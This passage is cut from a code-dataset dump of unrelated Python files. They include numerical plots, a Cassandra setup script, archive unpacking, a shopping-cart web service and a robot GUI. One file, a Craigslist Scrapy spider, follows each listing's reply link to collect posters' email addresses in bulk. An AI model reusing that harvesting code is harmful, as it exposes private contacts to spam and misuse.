np.abs(phi_analy-phi_galerkin5), label= \"5 Node num-analytical error\")\n plt.plot(plot_x, np.abs(phi_analy-phi_galerkin9), label= \"9 Node num-analytical error\")\n plt.title(\"Galerkin FE Error Compared to Analytic Solution\")\n plt.ylabel(\"Error\")\n plt.xlabel(\"x\")\n plt.legend()\n plt.show()\n","sub_path":"hw1/galerkin.py","file_name":"galerkin.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"288120031","text":"import numpy as np\n\na = np.arange(15)\n\n# method 1\nindex = np.where((a >= 5) & (a <= 10))\n# print(index)\nb = a[index]\nprint(a)\nprint(b)\n\n# method 2\nindex = np.where(np.logical_and(a>=5, a<=10))\nc = a[index]\nprint(c)\n\n# method 3\nd = a[(a >= 5) & (a <= 10)]\nprint(d)","sub_path":"从numpy数组中提取给定范围内的所有数字.py","file_name":"从numpy数组中提取给定范围内的所有数字.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"55123666","text":"import logging\nimport sys\n\nargvs = sys.argv\nksname = argvs[1]\n\nlog = logging.getLogger()\nlog.setLevel('DEBUG')\nhandler = logging.StreamHandler()\nhandler.setFormatter(logging.Formatter(\"%(asctime)s [%(levelname)s] %(name)s: %(message)s\"))\nlog.addHandler(handler)\n\nfrom cassandra import ConsistencyLevel\nfrom cassandra.cluster import Cluster\nfrom cassandra.query import SimpleStatement\n\nKEYSPACE = ksname\n\n\ndef main():\n cluster = Cluster(['127.0.0.1'])\n session = cluster.connect()\n\n log.info(\"creating keyspace...\")\n session.execute(\"\"\"\n CREATE KEYSPACE IF NOT EXISTS %s\n WITH replication = { 'class': 'SimpleStrategy', 'replication_factor': '2' }\n \"\"\" % KEYSPACE)\n\n log.info(\"setting keyspace...\")\n session.set_keyspace(KEYSPACE)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cassandra/create_keyspace_2.py","file_name":"create_keyspace_2.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"147430610","text":"\"\"\"\nWrite a Python program to find the minimum window in a given string which will contain all the characters of another given string.\nExample 1\nInput : str1 = \" PRWSOERIUSFK \"\nstr2 = \" OSU \"\nOutput: Minimum window is \"OERIUS\"\n\"\"\"\nimport collections\ndef min_window(str1, str2):\n result_char, missing_char = collections.Counter(str2), len(str2)\n i = p = q = 0\n for j, c in enumerate(str1, 1):\n missing_char -= result_char[c] > 0\n result_char[c] -= 1\n if not missing_char:\n while i < q and result_char[str1[i]] < 0:\n result_char[str1[i]] += 1\n i += 1\n if not q or j - i <= q - p:\n p, q = i, j\n return str1[p:q]\n \nstr1 = \"PRWSOERIUSFK\"\nstr2 = \"OSU\"\nprint(\"Original Strings:\\n\",str1,\"\\n\",str2)\nprint(\"Minimum window:\")\nprint(min_window(str1,str2))","sub_path":"Aniyom Ebenezer/Phase 2/STRINGS/Day_36_Challenge_Solution/Question 4 Solution.py","file_name":"Question 4 Solution.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"189361544","text":"from utils import read_aloud\nfrom twython import TwythonStreamer\nimport twitter\n\nif __name__ == \"__main__\":\n with open('apikey', 'r') as f:\n app_key, app_secret, oauth_token, oauth_token_secret = [s.strip() for s in f.readlines()]\n\n auth = twitter.OAuth(oauth_token, oauth_token_secret, app_key, app_secret)\n\n stream = twitter.stream.TwitterStream(auth=auth, domain='userstream.twitter.com')\n\n for msg in stream.user():\n if 'direct_message' in msg:\n read_aloud('{0}'.format(msg['direct_message']['text']))\n\n read_aloud(\"Uh-oh, the direct message stream stopped!\")\n","sub_path":"read_dms.py","file_name":"read_dms.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"598626319","text":"\nimport sys\nimport hashlib\nimport re\nimport os\nfrom multiprocessing import Process, current_process ,Queue, Pool\nimport threading\nimport socket\nimport datetime\nimport time\nimport urllib\nimport urllib.request\nimport zipfile\nimport json\nimport hashlib\nimport shutil\nfrom urllib.request import Request, urlopen\nimport signal\nimport patoolib\n#from unrar import rarfile\n\nimport unrar\nimport rarfile\n\nfrom requests import get\nfrom pyunpack import Archive\nimport filetype\nfrom bs4 import BeautifulSoup\nimport requests\n\nimport craw_comm as c_c\n\n\ndef handler(signum,frame):\n raise Exception(\"timeout\")\n\n\n\ndef unzip_process():\n temp_sample_list=[os.path.join(c_c.PATH_TEMP,fname) for fname in [fname for fname in os.listdir(c_c.PATH_TEMP)]]\n #TEMP 경로에 있는 파일 Unzip 수행\n #Unzip의 경우 zip 내 또 있을 수 있음.\n temp_sample_list=unzip_manager(temp_sample_list)\n \n for temp_sample in temp_sample_list:\n if temp_sample==c_c.PATH_TEMP:continue\n\n #Unzip 후 하위 디렉토리에 있는 것들 상위로 긁어옴\n dir_move_sample(temp_sample)\n #확장자 별로 파일 이동\n #OTHERS : 알 수 없음\n #ext : 확장자 별 이동\n sample_move_extenstion(temp_sample)\n \n #TEMP 폴더 내 빈 dir 파일이 있는 경우 하위 디렉토리까지 삭제\n dir_remove(temp_sample_list)\n\n\nunzip_list=['7z','bz2','xz','tar','rar','Z','lz','sqlite','swf','gz','zip','ar','arj','xz']\ndef unzip_manager(temp_sample_list):\n #반복문을 통한 flag 설정\n \n while True:\n for temp_sample in temp_sample_list:\n unzip_sample(temp_sample)\n temp_sample_list=[os.path.join(c_c.PATH_TEMP,fname) for fname in [fname for fname in os.listdir(c_c.PATH_TEMP)]]\n #만약, 압축 해제 했는데 zip이 있다면 리스트가 있을 것이고, 없으면 빈리스트\n temp_sample_list=[temp_sample for temp_sample in temp_sample_list if not os.path.isdir(temp_sample)]\n zip_list=[0 for temp_sample in temp_sample_list if filetype.guess(temp_sample) in unzip_list]\n if zip_list==[]:return temp_sample_list \n\n\ndef unzip_sample(temp_sample_path,_password=None):\n dir_path=os.path.dirname(temp_sample_path)\n if os.path.isdir(temp_sample_path):return\n if os.path.exists(temp_sample_path)!=True:return\n try:\n kind=filetype.guess(temp_sample_path)\n except Exception:\n return\n def _zip():\n try:\n zFile=zipfile.ZipFile(temp_sample_path)\n except zipfile.BadZipFile:\n etc_unpack()\n return\n\n if _password:\n try:\n zFile.setpassword(_password)\n except:\n pass\n for zfile_name in zFile.namelist():\n #Temp 경로에 압축해제 압축해재시 압축파일 내부에 있는 이름으로 진행\n try:\n zFile.extract(zfile_name,dir_path)\n except:\n continue\n #Temp에 압축해제된 파일 풀 경로 설정\n #unpack_file_path=os.path.join(dir_path,zfile_name)\n #unpack_file_path_list.append(unpack_file_path)\n zFile.close()\n\n def etc_unpack():\n #temp_sample_dir_path=temp_sample_path.split('.')[0]\n signal.signal(signal.SIGALRM, handler)\n signal.alarm(4)\n try:\n Archive(temp_sample_path).extractall(c_c.PATH_TEMP)\n except:\n return\n\n def _unrar():\n rf = rarfile.RarFile(temp_sample_path)\n try:\n rf.extractall(path=c_c.PATH_TEMP,pwd=_password) \n except:\n try:\n rf.extractall(path=c_c.PATH_TEMP)\n except:\n return\n\n if kind!=None:\n try:\n if kind.extension=='zip':\n _zip()\n elif kind.extension=='rar':\n _unrar()\n elif kind.extension in unzip_list:\n etc_unpack()\n except Exception:\n pass\n if kind.extension in unzip_list:\n try:\n os.remove(temp_sample_path)\n except:\n return \n\ndef dir_remove(temp_sample_list):\n \n dir_list=list()\n for temp_sample in temp_sample_list:\n if temp_sample==c_c.PATH_TEMP:continue\n\n if os.path.isdir(temp_sample):\n dir_list.append(temp_sample)\n\n for dir_ in list(set(dir_list)):\n shutil.rmtree(dir_,ignore_errors=True)\n\ndef sample_move_extenstion(temp_sample):\n if os.path.isdir(temp_sample):return\n if os.path.exists(temp_sample)!=True:return\n\n kind = filetype.guess(temp_sample)\n if kind!=None:\n if kind in unzip_list:\n return\n\n ext_fname_path,ext_path=get_type(temp_sample)\n if ext_fname_path==None:\n shutil.move(temp_sample,os.path.join(c_c.PATH_OTHERS,os.path.basename(temp_sample)))\n else:\n if not os.path.exists(ext_path): \n os.makedirs(ext_path)\n shutil.move(temp_sample,ext_fname_path) \n\n\n\n\n\n\n\ndef dir_move_sample(temp_sample):\n if os.path.isdir(temp_sample):\n for root, dirs, files in os.walk(temp_sample):\n for file_ in files:\n shutil.move(os.path.join(root,file_),os.path.join(c_c.PATH_TEMP,file_))\n\ndef get_type(temp_sample_path):\n try:\n kind = filetype.guess(temp_sample_path)\n except OSError:\n return None, ''\n\n file_name=os.path.basename(temp_sample_path).split('.')[0]\n\n if kind==None:\n \n if len(os.path.basename(file_name).split('.'))>=2:\n ext=os.path.basename(file_name).split('.')[1].replace('.','')\n ext_path=os.path.join(c_c.PATH,ext)\n ext_fname_path=os.path.join(ext_path,file_name)\n return ext_fname_path,ext_path\n else:\n\n return None,''\n\n else:\n ext_path=os.path.join(c_c.PATH,kind.extension)\n ext_fname_path=os.path.join(ext_path,file_name)\n return ext_fname_path,ext_path","sub_path":"unzip_manager.py","file_name":"unzip_manager.py","file_ext":"py","file_size_in_byte":5989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"239789115","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\n\n# init 12345\n# oldhead oldtail\n# 1---->2---->3---->4----->5\n# prev trav beyound\n\n\n# final 14325\n# newtail newhead\n# 1 2<----3<----4 5\n# prev trav beyound\n\n# reverse_k(trav, k) -> beyound, newhead, newtail \n\n# rewire\n# prev->newhead\n# newtail->beyound\n\n# advance\n# prev = trav\n# trav = beyound\n\n# k==3\n# nptr<-1<-2<-3 4\n# p t n\n\nclass Solution:\n def reverseKGroup(self, head: ListNode, k: int) -> ListNode:\n if not head: return head\n \n def has_k_nodes(trav, k):\n while trav and k:\n trav = trav.next\n k -= 1\n return k == 0\n \n def reverse_k_nodes(trav, k):\n newtail = trav\n prev = None\n for i in range(k):\n next_ = trav.next\n trav.next = prev\n prev = trav\n trav = next_\n return trav, prev, newtail\n \n dummy = prev = ListNode(None)\n trav = dummy.next = head\n while has_k_nodes(trav, k):\n beyound, newhead, newtail = reverse_k_nodes(trav, k)\n \n prev.next = newhead\n newtail.next = beyound\n \n prev = trav\n trav = beyound\n \n prev.next = trav\n return dummy.next\n","sub_path":"code/25_solution.py","file_name":"25_solution.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"325402784","text":"\"\"\"\n===================\nSyncing two folders\n===================\n\nThis example is about syncing two folders\nor creating a backup.\n\n\"\"\"\n\n###############################\nfrom pyquickhelper.filehelper import synchronize_folder\n\n###############################\ndest = \"temp_sync\"\nimport os\nif not os.path.exists(dest):\n print(\"creating\", dest)\n os.makedirs(dest)\nelse:\n print(\"folder already created\", dest)\n\n###############################\nsynchronize_folder(os.path.abspath(\".\"),\n dest, fLOG=print)\n","sub_path":"_doc/examples/plot_sync.py","file_name":"plot_sync.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"345705862","text":"from scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.contrib.linkextractors import LinkExtractor\nfrom scrapy.selector import Selector\nfrom scrapy.http.request import Request\nfrom raleigh.items import RaleighItem\nimport datetime\nfrom dateutil import parser\n\nclass RaleighSpider(CrawlSpider):\n name = 'raleigh'\n allowed_domains = [\"raleigh.craigslist.org\"]\n base_url = \"http://raleigh.craigslist.org\"\n start_urls = [\"http://raleigh.craigslist.org/search/apa?srchType=T&bedrooms=1&bathrooms=1\"]\n rules = [\n Rule(LinkExtractor(allow=(), restrict_xpaths=('//div[@class=\"content\"]//a[@class=\"button next\"]')), callback='parse_listings', follow=True)\n ]\n\n def parse_listings(self, response):\n today = datetime.datetime.now()\n since = today - datetime.timedelta(days=1)\n rows = Selector(response).xpath('//p[@class=\"row\"]')\n items = []\n for row in rows:\n datestr = self.getString(row.xpath('.//span[@class=\"pl\"]/time/@datetime').extract())\n date = parser.parse(datestr)\n if (date > since):\n item = RaleighItem()\n item['location'] = self.getString(row.xpath('.//span[@class=\"l2\"]/span[@class=\"pnr\"]/small/text()').extract())\n item['housing'] = self.getString(row.xpath('.//span[@class=\"l2\"]/span[@class=\"housing\"]/text()').extract())\n item['title'] = self.getString(row.xpath('.//span[@class=\"pl\"]/a[@class=\"hdrlnk\"]/text()').extract())\n item['url'] = self.base_url + self.getString(row.xpath('.//a/@href').extract())\n item['price'] = self.getString(row.xpath('.//span[@class=\"l2\"]/span[@class=\"price\"]/text()').extract())\n item['date'] = self.getString(row.xpath('.//span[@class=\"pl\"]/time/@datetime').extract())\n item['posting_id'] = self.getString(row.xpath('.//@data-pid').extract())\n request = Request(item['url'], callback=self.parse_individual)\n request.meta['item'] = item\n yield request\n\n def parse_individual(self, response):\n item = response.meta['item']\n reply_url = self.base_url + self.getString(response.xpath('.//span[@class=\"replylink\"]/a/@href').extract())\n request = Request(reply_url, callback=self.parse_reply)\n request.meta['item'] = item\n yield request\n\n def parse_reply(self, response):\n item = response.meta['item']\n item['email'] = self.getString(response.xpath('.//li/a[@class=\"mailapp\"]/text()').extract())\n return item\n\n def getString(self, field):\n if (type(field) == list and len(field)!= 0):\n return field[0].encode('utf-8')\n return \"\"\n","sub_path":"scrapy/raleigh/raleigh/spiders/raleigh_spider.py","file_name":"raleigh_spider.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"67369803","text":"@ask.intent('AlarmBuddy_SendSound', mapping={'friend_uname' : 'friend_uname', 'sound_id' : 'sound_id'})\r\ndef SendSoundIntent(friend_uname, sound_id):\r\n if(friend_uname is None):\r\n speak_output = \"Sorry, you must specify a username to send a sound to.\"\r\n return question(speak_output).reprompt(speak_output).simple_card('AddFriend_UnameError', speak_output)\r\n if(sound_id is None):\r\n speak_output = \"Sorry, you must specify a recorded alarm to send.\"\r\n return question(speak_output).reprompt(speak_output).simple_card('SendSound_SoundIdError', speak_output)\r\n\r\n #get list of friends\r\n friends_list_url = config['base_url'] + '/friendsWith/' + config['alarmbuddy_account']['username']\r\n friends_list = requests.get(friends_list_url, headers=header).json()\r\n\r\n #check that recipient is a friend\r\n friend_found = False\r\n for friend in friends_list:\r\n if friend['username2'] == friend_uname:\r\n friend_found = True\r\n if(not friend_found):\r\n speak_output = \"Sorry, you must be friends with someone to send them an alarm.\"\r\n return question(speak_output).reprompt(speak_output).simple_card('SendSound_NotFriendError', speak_output)\r\n \r\n #get list of sounds\r\n sound_list_url = config['base_url'] + '/sounds/' + config['alarmbuddy_account']['username']\r\n sound_list = requests.get(sound_list_url, headers=header).json()\r\n\r\n #find requested sound\r\n sound_to_send = None\r\n for sound in sound_list:\r\n if sound['soundID'] == sound_id:\r\n sound_to_send = sound\r\n\r\n if sound_to_send is None:\r\n speak_output = \"Sorry, an alarm sound with that name cannot be found. Have you recorded it?\"\r\n return question(speak_output).reprompt(speak_output).simple_card('SendSound_SoundNotFoundError', speak_output)\r\n\r\n #Send the sound.\r\n send_sound_url = config['base_url'] + '/shareSound/' + config['alarmbuddy_account']['username'] + '/' + friend_uname + '/' + str(sound_to_send['soundID'])\r\n u = requests.post(send_sound_url, headers=header)\r\n if(u.status_code != 201):\r\n speak_output = \"Something went wrong. We couldn't send the sound to your friend.\"\r\n return question(speak_output).reprompt(speak_output).simple_card('SendSound_Error', speak_output)\r\n\r\n return statement('Okay. ' + sound_to_send['soundName'] + ' has been sent to ' + friend_uname)\r\n","sub_path":"Amazon Skills Development/send_sound.py","file_name":"send_sound.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"36402304","text":"# -*- coding: utf-8 -*-\n\nimport web\nimport json\nimport logging\nimport protocol\nfrom config import *\nfrom utils import *\nfrom session_manager import SessionManager\n\nlogger = logging.getLogger()\n\nclass Handler:\n def POST(self):\n req = protocol.ReportCommentReq(web.input(), web.cookies())\n resp = protocol.ReportCommentResp()\n\n if not SessionManager.instance().check_session(req.session_id, req.device_id, req.userid):\n resp.res = 401\n resp.msg = '登陆态异常'\n return resp.dump_json()\n \n url = 'http://' + TASK_BACKEND + '/report_comment'\n data = {\n 'userid': req.userid,\n 'device_id': req.device_id\n }\n\n r = http_request(url, data)\n if r['rtn'] == 0:\n resp.income = r.get('income', 0)\n else:\n resp.res = 1\n resp.msg = 'error'\n\n return resp.dump_json()\n\n","sub_path":"wangcai_svr/interface/src/req_task_comment.py","file_name":"req_task_comment.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"103743915","text":"import re\nimport json\nimport csv\nimport os\n\ndef save(filepath,data):\n if os.path.exists(filepath):\n with open(filepath,'a',encoding='utf-8-sig' ,newline='' ) as f:\n csv_f=csv.writer(f)\n csv_f.writerow(list(data.values()))\n else:\n with open(filepath,'a',encoding='utf-8-sig' ,newline='' ) as f:\n csv_f=csv.writer(f)\n csv_f.writerow(list(data.keys()))\n csv_f.writerow(list(data.values()))\n\nf=open('s.json','r',encoding='utf-8')\nleft_str=''\ncount=0\nchunksize=100000000\nwhile True:\n chunk=f.read(chunksize)\n if not chunk:\n break\n chunk=left_str+chunk\n\n for item in re.findall(r'(\\{.*?date.*?\\})',chunk,re.S):\n try:\n json_item=json.loads(item)\n date=json_item['date'][:4]\n save(filepath=date+'.csv',data=json_item)\n except Exception as e:\n print(e)\n\n left_str=''\n\n count+=chunksize\n print(count,len(left_str))\n print(f'已处理{count/1024/1024}Mb')\n\nf.close()","sub_path":"job-json,xml,csv/Re-拆分过滤json/拆分json.py","file_name":"拆分json.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"386179113","text":"# 2520 is the smallest number that can be divided\n# by each of the numbers from 1 to 10 without any remainder.\n#\n# What is the smallest positive number that is evenly\n# divisible by all of the numbers from 1 to 20?\n\n\ndef isDivisiable(div, max_range):\n for i in range(1, max_range):\n if div % i != 0:\n return False\n return True\n\ndef main():\n i = 1\n\n while True:\n if isDivisiable(i, 20):\n break\n i += 1\n\n print(i)\n\n\nif __name__ == \"__main__\":\n print(2* 3 * 2* 5* 7* 2* 3 * 11 * 13 * 2 * 17 * 19)\n","sub_path":"1-10/SmallestMultiple.py","file_name":"SmallestMultiple.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"17685717","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport sys\nimport string\nimport os\n\ndef SeparaCampos(s):\n # Os campos estão separados por muitos espaços. Precisamos trocar estas\n # cadeias de espaços por uma vírgula. As linhas já terminam com \\n\n\n resposta = ''\n estado = 0\n for letra in s:\n if estado == 0:\n if letra != ' ': # está no meio de uma string\n resposta += letra\n elif letra == ' ': # não sei se é separador de palavras ou não\n estado = 1\n elif estado == 1:\n if letra != ' ': # foi espaço separador de palavras\n resposta += ' ' + letra\n estado = 0\n elif letra == ' ': # sequencia de espaços\n resposta += ','\n estado = 2\n elif estado == 2:\n if letra != ' ': # terminou a sequencia de espaços\n resposta += letra\n estado = 0\n return resposta\n\n\ndef ConvertePDF2CSV(pdf):\n # Só precisamos processar as linhas que comecem com 1 espaço\n\n txt = string.replace(pdf, '.pdf', '.txt')\n csv = string.replace(pdf, '.pdf', '.csv')\n os.system('pdftotext -layout ' + pdf)\n entrada = open(txt).readlines()\n saida = open(csv, 'wt')\n\n dados = filter(lambda x: (x[0] == ' ') and (x[1] != ' '), entrada)\n resultado = []\n for linha in dados:\n resultado.append(SeparaCampos(string.replace(linha[1:], ',', '.')))\n\n saida.writelines(resultado)\n return\n\nif len(sys.argv) == 2:\n ConvertePDF2CSV(sys.argv[1])\n","sub_path":"FolhaPagamento/converteCSV.py","file_name":"converteCSV.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"583693053","text":"import flask\r\nimport json\r\nimport os\r\nimport fnmatch\r\nimport time\r\nfrom flask import request\r\nfrom flask import Blueprint\r\nfrom utils.db_connection import mysql\r\n\r\n\r\n\r\nkorpa_service = Blueprint(\"korpa\", __name__)\r\n\r\n@korpa_service.route(\"/dodajUkorpu/\", methods=[\"POST\"])\r\ndef dodajUKorpu(id_proizvoda):\r\n data = request.json\r\n db = mysql.get_db()\r\n cursor = db.cursor()\r\n\r\n q = '''INSERT INTO korpa_proizvod(korpa_id, kolicina, proizvod_id)\r\n VALUES(%s, %s, %s)'''\r\n cursor.execute(q, (data[\"korpa_id\"], data[\"kolicina\"], id_proizvoda))\r\n db.commit()\r\n \r\n return flask.jsonify({\"status\": \"done\"}), 201\r\n\r\n@korpa_service.route(\"/dobaviIzKorpe/\", methods=[\"GET\"])\r\ndef dobaviIzKorpe(id_korpe):\r\n cursor = mysql.get_db().cursor()\r\n cursor.execute(\"SELECT * FROM korpa_proizvod LEFT JOIN proizvod ON proizvod_id = proizvod.id WHERE korpa_id = %s AND proizvod.postoji = 1\", id_korpe)\r\n rows = cursor.fetchall()\r\n\r\n for x in range(0, len(rows)):\r\n files = os.listdir(\"static/proizvodi\")\r\n slika = fnmatch.filter(files, \"proizvod_{0}.*\".format(rows[x][\"id\"]))\r\n if slika != []:\r\n rows[x][\"slika\"] = slika[0]\r\n\r\n return flask.jsonify(rows)\r\n\r\n@korpa_service.route(\"/dobaviSaRacuna/\", methods=[\"GET\"])\r\ndef dobaviSaRacuna(id_korisnika):\r\n cursor = mysql.get_db().cursor()\r\n cursor.execute(\"SELECT racun_id FROM korisnik_racun WHERE korisnik_id = %s\", id_korisnika)\r\n id_racuna = cursor.fetchall()\r\n rows = []\r\n for x in range(0, len(id_racuna)):\r\n q = '''SELECT * FROM racun_proizvod LEFT JOIN proizvod ON proizvod_id = proizvod.id \r\n LEFT JOIN racun ON racun_id = racun.id WHERE racun_id = %s'''\r\n cursor.execute(q, id_racuna[x][\"racun_id\"])\r\n row = cursor.fetchall()\r\n if row is not None:\r\n for x in row:\r\n rows.append(x)\r\n\r\n for x in range(0, len(rows)):\r\n files = os.listdir(\"static/proizvodi\")\r\n slika = fnmatch.filter(files, \"proizvod_{0}.*\".format(rows[x][\"id\"]))\r\n if slika != []:\r\n rows[x][\"slika\"] = slika[0]\r\n\r\n return flask.jsonify(rows)\r\n\r\n@korpa_service.route(\"/izmeniKorpu/\", methods=[\"PUT\"])\r\ndef izmeni_korpu():\r\n data = request.json\r\n db = mysql.get_db()\r\n cursor = db.cursor()\r\n q = '''UPDATE korpa_proizvod SET kolicina=%s WHERE korpa_id=%s AND proizvod_id = %s'''\r\n cursor.execute(q, (data[\"kolicina\"], data[\"korpa_id\"], data[\"proizvod_id\"]))\r\n db.commit()\r\n\r\n return flask.jsonify({\"status\": \"done\"}), 201\r\n\r\n@korpa_service.route(\"/ukloniIzKorpe//\", methods=[\"DELETE\"])\r\ndef ukloni(id_korpe, id_proizvoda):\r\n db = mysql.get_db()\r\n cursor = db.cursor()\r\n q = '''DELETE FROM korpa_proizvod WHERE korpa_id=%s AND proizvod_id = %s'''\r\n cursor.execute(q, (id_korpe, id_proizvoda))\r\n db.commit()\r\n\r\n return flask.jsonify({\"status\": \"done\"}), 201\r\n\r\n@korpa_service.route(\"/ukloniSveIzKorpe/\", methods=[\"DELETE\"])\r\ndef ukloniSveIzKorpe(id_korpe):\r\n db = mysql.get_db()\r\n cursor = db.cursor()\r\n q = '''DELETE FROM korpa_proizvod WHERE korpa_id=%s'''\r\n cursor.execute(q, (id_korpe))\r\n db.commit()\r\n\r\n return flask.jsonify({\"status\": \"done\"}), 201","sub_path":"blueprints/korpa_service.py","file_name":"korpa_service.py","file_ext":"py","file_size_in_byte":3317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"575335020","text":"from ignite.exceptions import NotComputableError\nfrom ignite.metrics import MeanSquaredError\nimport pytest\nimport torch\n\n\ndef test_zero_div():\n mse = MeanSquaredError()\n with pytest.raises(NotComputableError):\n mse.compute()\n\n\ndef test_compute():\n mse = MeanSquaredError()\n\n y_pred = torch.Tensor([[2.0], [-2.0]])\n y = torch.zeros(2)\n mse.update((y_pred, y))\n assert isinstance(mse.compute(), float)\n assert mse.compute() == 4.0\n\n mse.reset()\n y_pred = torch.Tensor([[3.0], [-3.0]])\n y = torch.zeros(2)\n mse.update((y_pred, y))\n assert isinstance(mse.compute(), float)\n assert mse.compute() == 9.0\n","sub_path":"tests/ignite/metrics/test_mean_squared_error.py","file_name":"test_mean_squared_error.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"356948287","text":"\"\"\"\n Capstone Project. Code to run on a LAPTOP (NOT the robot).\n Displays the Graphical User Interface (GUI) and communicates with the robot.\n\n Authors: Your professors (for the framework)\n and Trey Kline.\n Winter term, 2018-2019.\n\"\"\"\n\nimport mqtt_remote_method_calls as com\nimport shared_gui\nimport tkinter\nfrom tkinter import ttk\n\ndef main():\n \"\"\"\n This code, which must run on a LAPTOP:\n 1. Constructs a GUI for my part of the Capstone Project.\n 2. Communicates via MQTT with the code that runs on the EV3 robot.\n \"\"\"\n # -------------------------------------------------------------------------\n # Construct and connect the MQTT Client:\n # -------------------------------------------------------------------------\n mqtt_sender = com.MqttClient()\n mqtt_sender.connect_to_ev3()\n\n # -------------------------------------------------------------------------\n # The root TK object for the GUI:\n # -------------------------------------------------------------------------\n root = tkinter.Tk()\n root.title('BSSE 420 Bapstone Broject')\n music_window = tkinter.Tk()\n music_window.title('Maestro Bot')\n\n\n\n # -------------------------------------------------------------------------\n # The main frame, upon which the other frames are placed.\n # -------------------------------------------------------------------------\n main_frame = ttk.Frame(root, padding=10, borderwidth=5, relief='groove')\n music_frame = ttk.Frame(music_window, padding=10, borderwidth=5, relief='groove')\n main_frame.grid()\n music_frame.grid()\n\n # -------------------------------------------------------------------------\n # Sub-frames for the shared GUI that the team developed:\n # -------------------------------------------------------------------------\n teleop_frame, arm_frame, control_frame, sound_frame, color_frame, proximity_frame, camera_frame = get_shared_frames(main_frame, mqtt_sender)\n find_object = get_my_frames(main_frame, mqtt_sender)\n\n # -------------------------------------------------------------------------\n # Frames that are particular to my individual contributions to the project.\n # -------------------------------------------------------------------------\n # TODO: Implement and call get_my_frames(...)\n maestro_bot_frames = get_music_frames(music_window, mqtt_sender)\n\n # -------------------------------------------------------------------------\n # Grid the frames.\n # -------------------------------------------------------------------------\n grid_frames(teleop_frame, arm_frame, control_frame, sound_frame, color_frame, proximity_frame, camera_frame, find_object)\n maestro_bot_frames.grid(row=0, column=0)\n\n # -------------------------------------------------------------------------\n # The event loop:\n # -------------------------------------------------------------------------\n root.mainloop()\n music_window.mainloop()\n\n\ndef get_shared_frames(main_frame, mqtt_sender):\n teleop_frame = shared_gui.get_teleoperation_frame(main_frame, mqtt_sender)\n arm_frame = shared_gui.get_arm_frame(main_frame, mqtt_sender)\n control_frame = shared_gui.get_control_frame(main_frame, mqtt_sender)\n sound_frame = shared_gui.get_sound_frame(main_frame, mqtt_sender)\n color_frame = shared_gui.get_color_frame(main_frame, mqtt_sender)\n proximity_frame = shared_gui.get_proximity_frame(main_frame, mqtt_sender)\n camera_frame = shared_gui.get_camera_frame(main_frame, mqtt_sender)\n return teleop_frame, arm_frame, control_frame, sound_frame, color_frame, proximity_frame, camera_frame\n\ndef grid_frames(teleop_frame, arm_frame, control_frame, sound_frame, color_frame, proximity_frame, camera_frame, find_object):\n teleop_frame.grid(row=0, column=0)\n arm_frame.grid(row=1, column=0)\n control_frame.grid(row=2, column=0)\n sound_frame.grid(row=3, column=0)\n color_frame.grid(row=4, column=0)\n proximity_frame.grid(row=5, column=0)\n camera_frame.grid(row=0, column=1)\n find_object.grid(row=1, column=1)\n\ndef get_my_frames(window, mqtt_sender):\n frame = ttk.Frame(window, padding=10, borderwidth=5, relief=\"ridge\")\n frame.grid()\n\n frame_label = ttk.Label(frame, text=\"Find Object and Make Tones\")\n freq_lable = ttk.Label(frame, text='Starting Frequency')\n rate_lable = ttk.Label(frame, text='Rate of Increase')\n\n freq_entry = ttk.Entry(frame, width='8')\n rate_entry = ttk.Entry(frame, width='8')\n\n start_button=ttk.Button(frame, text='Find Using IR')\n clockwise_button=ttk.Button(frame, text='Spin clockwise and Find')\n counterclockwise_button = ttk.Button(frame, text='Spin counterclockwise and Find')\n\n frame_label.grid(row=0, column=0)\n freq_lable.grid(row=1, column=0)\n freq_entry.grid(row=1, column=1)\n rate_lable.grid(row=2, column=0)\n rate_entry.grid(row=2, column=1)\n start_button.grid(row=3, column=0)\n clockwise_button.grid(row=3, column=1)\n counterclockwise_button.grid(row=3, column=2)\n\n start_button['command'] = lambda : handle_find_object_ir(freq_entry, rate_entry, mqtt_sender)\n clockwise_button['command'] = lambda : handle_find_object_camera(freq_entry, rate_entry, 1, mqtt_sender)\n counterclockwise_button['command'] = lambda: handle_find_object_camera(freq_entry, rate_entry, 0, mqtt_sender)\n\n return frame\n\ndef get_music_frames(window, mqtt_sender):\n frame = 